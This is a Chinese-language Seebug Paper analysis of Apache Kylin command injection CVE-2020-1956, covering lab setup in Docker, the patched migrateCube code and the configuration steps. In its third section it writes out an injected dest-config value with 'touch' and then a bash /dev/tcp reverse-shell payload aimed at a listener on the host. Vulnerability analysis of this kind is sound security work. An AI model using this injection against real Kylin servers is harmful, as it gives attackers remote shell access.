Apache Kylin 命令注入漏洞 CVE-2020-1956 POC 分析

作者：香依香偎
原文鏈接：聞道解惑（wendao_jiehuo）
本文為作者投稿，Seebug Paper 期待你的分享，凡經采用即有禮品相送！
投稿郵箱：paper@seebug.org

CVE-2020-1956

2020年5月22日，CNVD 通報了 Apache Kylin 存在命令注入漏洞 CVE-2020-1956，地址在 http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202005-1133 。

Apache Kylin 是美國 Apache 軟件基金會的一款開源的分布式分析型數據倉庫。該產品主要提供 Hadoop/Spark 之上的 SQL 查詢接口及多維分析（OLAP）等功能。

Apache Kylin 中的靜態 API 存在安全漏洞。攻擊者可借助特制輸入利用該漏洞在系統上執行任意OS命令。以下產品及版本受到影響：Apache Kylin 2.3.0版本至2.3.2版本，2.4.0版本至2.4.1版本，2.5.0版本至2.5.2版本，2.6.0版本至2.6.5版本，3.0.0-alpha版本，3.0.0-alpha2版本，3.0.0-beta版本，3.0.0版本，3.0.1版本。

下面就來分析一下這個漏洞。

一、搭建環境

Kylin 的環境并不好搭建，包括 Hadoop、Hbase、Spark、Kafka 等等一系列的組件需要安裝配置。幸好，Kylin 官網文檔 http://kylin.apache.org/cn/docs/install/kylin_docker.html 提供了 Docker 環境的啟動指南，分別執行這兩個命令即可一鍵啟動。

docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1

使用默認密碼 admin/KYLIN 登錄，就能看到已經配置好的模型（models），環境搭建大功告成。

二、Migrate Cube

這個漏洞的補丁代碼在 github 上，地址是 https://github.com/apache/kylin/commit/9cc3793ab2f2f0053c467a9b3f38cb7791cd436a# 。

可以看出，漏洞點在 CubeService.java 中的 migrateCube() 函數，漏洞原因是使用 String.format() 格式化待執行的系統命令且未做過濾，導致命令內容可被注入，涉及的參數包括 srcCfgUri、dstCfgUri、projectName三個。

Migrate Cube 是什么？在官網的文檔的 Restful 章節 中，可以看到這個 Restful接口的描述：

接口中顯示需要兩個路徑入參，分別是 cube 和 project。回看 kylin 頁面上的表格里，已經顯示了 cube name 和對應的 Project 。

我們選擇第一行記錄中的cube：kylin_sales_cube 和對應的 Project：learn_kylin 作為路徑參數，POST 這個報文看看。

收到錯誤響應，提示 One click migration is disable。

One click migration is disable 的提示，看起來有點眼熟。回看一眼patch code，嘿，原來這個錯誤提示就在 migrateCube() 函數的開頭呀。

對應的配置檢查函數 isAllowAutoMigrateCube() 在 KylinConfigBase.java 中，從配置項中讀取了 kylin.tool.auto-migrate-cube.enabled，默認值為 FALSE。

如果要把配置修改為 true，有兩個辦法。

• 方法一：使用 docker exec -it bash 命令進入容器，修改其中 conf/kylin.properties 文件，增加 kylin.tool.auto-migrate-cube.enabled=true 的配置項，然后在容器中使用 bin/kylin stop 和 bin/kylin start 命令重啟 kylin。

• 方法二：在 WEB 界面上點擊 SYSTEM 和 SET Config，手動輸入配置項名稱 kylin.tool.auto-migrate-cube.enabled 和值 True。

方法一是永久有效，只是需要重啟 kylin 進程；方法二立即生效但進程重啟或 Reload Config 之后就失效。我們選擇相對簡單一些的方法二來操作。

修改完配置之后，再次發送 POST Migrate Cube 的報文，這次的報錯提示為 Source configuration should not be empty.

對應代碼中的 srcCfgUri 和 dstCfgUri 的非空檢查。

這兩個值同樣來自于配置項，分別是 kylin.tool.auto-migrate-cube.src-config 和 kylin.tool.auto-migrate-cube.dest-config。

我們可以用前面配置 kylin.tool.auto-migrate-cube.enabled 同樣的方法來配置這兩個值。不過，在配置之前，你有沒有注意到，這兩個值，就是命令注入的關鍵參數呢？

三、命令注入

好，用 destCfgUri 來注入試試。在界面上 Set Config，把 srcCfgUri 配置為 /home/admin/apache-kylin-3.0.1-bin-hbase1x/conf/kylin.propertie，將 destCfgUri 配置為 /tmp/kylin.properties kylin_sales_cube learn_kylin true true true true; touch /tmp/xiang; echo 。注意其中注入了 touch /tmp/xiang 的系統命令。

重新發起 Migrate Cube 的請求。

收到 200 成功響應。

查看 docker 容器，注入的命令 touch /tmp/xiang 已經成功執行。

可以反彈 shell 么？當然可以。將 kylin.tool.auto-migrate-cube.dest-config 配置為 /tmp/kylin.properties kylin_sales_cube learn_kylin true true true true; bash -i >& /dev/tcp/172.17.0.1/9999 0>&1; echo 。其中注入的命令從 touch /tmp/xiang 換成了反彈 shell 的命令 bash -i >& /dev/tcp/172.17.0.1/9999 0>&1，反彈到宿主機 172.17.0.1 上。

在宿主機上啟動監聽。

再發送一次 Migrate Cube 報文，等待幾秒即可獲取反彈 shell。

本文由 Seebug Paper 發布，如需轉載請注明來源。本文地址：http://www.bjnorthway.com/1237/